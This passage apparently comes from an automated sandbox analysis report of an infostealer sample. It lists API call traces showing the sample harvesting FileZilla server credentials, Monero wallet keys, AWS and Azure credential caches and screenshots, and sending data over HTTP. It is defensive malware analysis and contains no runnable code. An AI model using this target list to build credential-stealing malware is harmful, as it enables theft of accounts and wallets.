                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BE0DB2), ref: 00BD054A
                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00BD0562
                    • lstrcat.KERNEL32(?,profile: null), ref: 00BD0571
                    • lstrcat.KERNEL32(?,url: ), ref: 00BD0580
                    • lstrcat.KERNEL32(?,00000000), ref: 00BD0593
                    • lstrcat.KERNEL32(?,00BE1678), ref: 00BD05A2
                    • lstrcat.KERNEL32(?,00000000), ref: 00BD05B5
                    • lstrcat.KERNEL32(?,00BE167C), ref: 00BD05C4
                    • lstrcat.KERNEL32(?,login: ), ref: 00BD05D3
                    • lstrcat.KERNEL32(?,00000000), ref: 00BD05E6
                    • lstrcat.KERNEL32(?,00BE1688), ref: 00BD05F5
                    • lstrcat.KERNEL32(?,password: ), ref: 00BD0604
                    • lstrcat.KERNEL32(?,00000000), ref: 00BD0617
                    • lstrcat.KERNEL32(?,00BE1698), ref: 00BD0626
                    • lstrcat.KERNEL32(?,00BE169C), ref: 00BD0635
                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BE0DB2), ref: 00BD068E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                    • API String ID: 1942843190-555421843
                    • Opcode ID: dbfac29bdb92a93620c6e6848029c0baa7bdc265f835c27def7c5c18ec4d91d0
                    • Instruction ID: 64257bb1a9613ea6ccff80c08931508e4af7a0b4b05a93c91b60bb09ee6419cc
                    • Opcode Fuzzy Hash: dbfac29bdb92a93620c6e6848029c0baa7bdc265f835c27def7c5c18ec4d91d0
                    • Instruction Fuzzy Hash: 7CD150719102089FCB04FBE4DD96EEEB3B8EF14300F5485A9F502B6191EF75AA49CB61
                    Function 00BC5960 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 495networkstringmemoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BDA7E6
                      • Part of subcall function 00BC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BC4839
                      • Part of subcall function 00BC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BC4849
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00BC59F8
                    • StrCmpCA.SHLWAPI(?,013CEA08), ref: 00BC5A13
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BC5B93
                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,013CEAC8,00000000,?,013CA780,00000000,?,00BE1A1C), ref: 00BC5E71
                    • lstrlen.KERNEL32(00000000), ref: 00BC5E82
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00BC5E93
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BC5E9A
                    • lstrlen.KERNEL32(00000000), ref: 00BC5EAF
                    • lstrlen.KERNEL32(00000000), ref: 00BC5ED8
                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00BC5EF1
                    • lstrlen.KERNEL32(00000000,?,?), ref: 00BC5F1B
                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00BC5F2F
                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00BC5F4C
                    • InternetCloseHandle.WININET(00000000), ref: 00BC5FB0
                    • InternetCloseHandle.WININET(00000000), ref: 00BC5FBD
                    • HttpOpenRequestA.WININET(00000000,013CEA18,?,013CDFD8,00000000,00000000,00400100,00000000), ref: 00BC5BF8
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                    • InternetCloseHandle.WININET(00000000), ref: 00BC5FC7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                    • String ID: "$"$------$------$------$de-DE
                    • API String ID: 874700897-1932956479
                    • Opcode ID: cc9136a9bad73b44333713cc3ef977cdab795c356be2540a317e122520f98268
                    • Instruction ID: 4c8f7c235716f2649b1f1f6e6f58d31fb78a8aa4043b7f96724586f76434fbfb
                    • Opcode Fuzzy Hash: cc9136a9bad73b44333713cc3ef977cdab795c356be2540a317e122520f98268
                    • Instruction Fuzzy Hash: 90121E71820118AADB15EBA0DC95FEEF3B8BF14700F5041EAB50672191FF712A89DF65
                    Function 00BCCEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                      • Part of subcall function 00BD8B60: GetSystemTime.KERNEL32(00BE0E1A,013CA5A0,00BE05AE,?,?,00BC13F9,?,0000001A,00BE0E1A,00000000,?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BD8B86
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BCCF83
                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00BCD0C7
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BCD0CE
                    • lstrcat.KERNEL32(?,00000000), ref: 00BCD208
                    • lstrcat.KERNEL32(?,00BE1478), ref: 00BCD217
                    • lstrcat.KERNEL32(?,00000000), ref: 00BCD22A
                    • lstrcat.KERNEL32(?,00BE147C), ref: 00BCD239
                    • lstrcat.KERNEL32(?,00000000), ref: 00BCD24C
                    • lstrcat.KERNEL32(?,00BE1480), ref: 00BCD25B
                    • lstrcat.KERNEL32(?,00000000), ref: 00BCD26E
                    • lstrcat.KERNEL32(?,00BE1484), ref: 00BCD27D
                    • lstrcat.KERNEL32(?,00000000), ref: 00BCD290
                    • lstrcat.KERNEL32(?,00BE1488), ref: 00BCD29F
                    • lstrcat.KERNEL32(?,00000000), ref: 00BCD2B2
                    • lstrcat.KERNEL32(?,00BE148C), ref: 00BCD2C1
                    • lstrcat.KERNEL32(?,00000000), ref: 00BCD2D4
                    • lstrcat.KERNEL32(?,00BE1490), ref: 00BCD2E3
                      • Part of subcall function 00BDA820: lstrlen.KERNEL32(00BC4F05,?,?,00BC4F05,00BE0DDE), ref: 00BDA82B
                      • Part of subcall function 00BDA820: lstrcpy.KERNEL32(00BE0DDE,00000000), ref: 00BDA885
                    • lstrlen.KERNEL32(?), ref: 00BCD32A
                    • lstrlen.KERNEL32(?), ref: 00BCD339
                      • Part of subcall function 00BDAA70: StrCmpCA.SHLWAPI(013C8FA8,00BCA7A7,?,00BCA7A7,013C8FA8), ref: 00BDAA8F
                    • DeleteFileA.KERNEL32(00000000), ref: 00BCD3B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                    • String ID:
                    • API String ID: 1956182324-0
                    • Opcode ID: eca5b0c7382ecd9a4c046922675aba11342280d60769c2a25d5564e2edbf5520
                    • Instruction ID: d9bea7750b229a421924744ac40401577b6af9763135063f9c1a6c69a7ee64ac
                    • Opcode Fuzzy Hash: eca5b0c7382ecd9a4c046922675aba11342280d60769c2a25d5564e2edbf5520
                    • Instruction Fuzzy Hash: 66E138719101089FCB04EBA0DD96EEEB3B8BF14301F1441A9F507B6191EF36AE49DB66
                    Function 00BCC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,013CD4B8,00000000,?,00BE144C,00000000,?,?), ref: 00BCCA6C
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00BCCA89
                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00BCCA95
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BCCAA8
                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00BCCAD9
                    • StrStrA.SHLWAPI(?,013CD4A0,00BE0B52), ref: 00BCCAF7
                    • StrStrA.SHLWAPI(00000000,013CD548), ref: 00BCCB1E
                    • StrStrA.SHLWAPI(?,013CD6E0,00000000,?,00BE1458,00000000,?,00000000,00000000,?,013C8F88,00000000,?,00BE1454,00000000,?), ref: 00BCCCA2
                    • StrStrA.SHLWAPI(00000000,013CD820), ref: 00BCCCB9
                      • Part of subcall function 00BCC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00BCC871
                      • Part of subcall function 00BCC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00BCC87C
                    • StrStrA.SHLWAPI(?,013CD820,00000000,?,00BE145C,00000000,?,00000000,013C8F98), ref: 00BCCD5A
                    • StrStrA.SHLWAPI(00000000,013C9198), ref: 00BCCD71
                      • Part of subcall function 00BCC820: lstrcat.KERNEL32(?,00BE0B46), ref: 00BCC943
                      • Part of subcall function 00BCC820: lstrcat.KERNEL32(?,00BE0B47), ref: 00BCC957
                      • Part of subcall function 00BCC820: lstrcat.KERNEL32(?,00BE0B4E), ref: 00BCC978
                    • lstrlen.KERNEL32(00000000), ref: 00BCCE44
                    • CloseHandle.KERNEL32(00000000), ref: 00BCCE9C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                    • String ID:
                    • API String ID: 3744635739-3916222277
                    • Opcode ID: fd37f7b2560c30681d58e9859a40c1803bb39bca3f630b7b304ead6f0ed715d6
                    • Instruction ID: 1652c9909fb3d743f850d7abcfb78c18c27f1ded7f673e8c44480d7bd0e4c44c
                    • Opcode Fuzzy Hash: fd37f7b2560c30681d58e9859a40c1803bb39bca3f630b7b304ead6f0ed715d6
                    • Instruction Fuzzy Hash: A6E11171900148AFDB14EBA4DC91FEEB7B8AF14300F4441AAF50677291EF356A4ACF66
                    Function 00BD8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                    • RegOpenKeyExA.ADVAPI32(00000000,013CB148,00000000,00020019,00000000,00BE05B6), ref: 00BD83A4
                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00BD8426
                    • wsprintfA.USER32 ref: 00BD8459
                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00BD847B
                    • RegCloseKey.ADVAPI32(00000000), ref: 00BD848C
                    • RegCloseKey.ADVAPI32(00000000), ref: 00BD8499
                      • Part of subcall function 00BDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BDA7E6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                    • String ID: - $%s\%s$?
                    • API String ID: 3246050789-3278919252
                    • Opcode ID: aa65896ce28dd32415f316dd539c73bc916d27e70af9466f501082f55036974a
                    • Instruction ID: 0f150f2f54a0dafbcac95445c40e26a8eb8b0bba76b08938b97fe8b98d70b5f2
                    • Opcode Fuzzy Hash: aa65896ce28dd32415f316dd539c73bc916d27e70af9466f501082f55036974a
                    • Instruction Fuzzy Hash: CC81FD7191021C9FDB24DB54CC95FEAB7B8FB08700F0482D9E509A6190EF756A89CF95
                    Function 00BD4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BD8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BD8E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 00BD4DB0
                    • lstrcat.KERNEL32(?,\.azure\), ref: 00BD4DCD
                      • Part of subcall function 00BD4910: wsprintfA.USER32 ref: 00BD492C
                      • Part of subcall function 00BD4910: FindFirstFileA.KERNEL32(?,?), ref: 00BD4943
                    • lstrcat.KERNEL32(?,00000000), ref: 00BD4E3C
                    • lstrcat.KERNEL32(?,\.aws\), ref: 00BD4E59
                      • Part of subcall function 00BD4910: StrCmpCA.SHLWAPI(?,00BE0FDC), ref: 00BD4971
                      • Part of subcall function 00BD4910: StrCmpCA.SHLWAPI(?,00BE0FE0), ref: 00BD4987
                      • Part of subcall function 00BD4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00BD4B7D
                      • Part of subcall function 00BD4910: FindClose.KERNEL32(000000FF), ref: 00BD4B92
                    • lstrcat.KERNEL32(?,00000000), ref: 00BD4EC8
                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00BD4EE5
                      • Part of subcall function 00BD4910: wsprintfA.USER32 ref: 00BD49B0
                      • Part of subcall function 00BD4910: StrCmpCA.SHLWAPI(?,00BE08D2), ref: 00BD49C5
                      • Part of subcall function 00BD4910: wsprintfA.USER32 ref: 00BD49E2
                      • Part of subcall function 00BD4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00BD4A1E
                      • Part of subcall function 00BD4910: lstrcat.KERNEL32(?,013CE9A8), ref: 00BD4A4A
                      • Part of subcall function 00BD4910: lstrcat.KERNEL32(?,00BE0FF8), ref: 00BD4A5C
                      • Part of subcall function 00BD4910: lstrcat.KERNEL32(?,?), ref: 00BD4A70
                      • Part of subcall function 00BD4910: lstrcat.KERNEL32(?,00BE0FFC), ref: 00BD4A82
                      • Part of subcall function 00BD4910: lstrcat.KERNEL32(?,?), ref: 00BD4A96
                      • Part of subcall function 00BD4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00BD4AAC
                      • Part of subcall function 00BD4910: DeleteFileA.KERNEL32(?), ref: 00BD4B31
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                    • API String ID: 949356159-974132213
                    • Opcode ID: 72919b6455d5ab07fff9f0407c0cc278be83de293ab0b542df7d26c1f85bee32
                    • Instruction ID: 86977323ea8ab649f0f0979c0127bd2f1835163b440f0b746b0789d5a7bc8426
                    • Opcode Fuzzy Hash: 72919b6455d5ab07fff9f0407c0cc278be83de293ab0b542df7d26c1f85bee32
                    • Instruction Fuzzy Hash: 8A41A37A9402086BDB54F770DC47FED73B8AB24700F0048E4B589661C2FEB59BC98B92
                    Function 00BD9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                    Download Yara Rule
                    APIs
                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00BD906C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateGlobalStream
                    • String ID: image/jpeg
                    • API String ID: 2244384528-3785015651
                    • Opcode ID: c92ffa3772e90731f227d718e48c6ca0735e7534c9212beb91e54f49e8b5fb62
                    • Instruction ID: 8a5a12a882cabce02a3cf0ae8761999b36504c67cc21b476f52d21af52a7a1c7
                    • Opcode Fuzzy Hash: c92ffa3772e90731f227d718e48c6ca0735e7534c9212beb91e54f49e8b5fb62
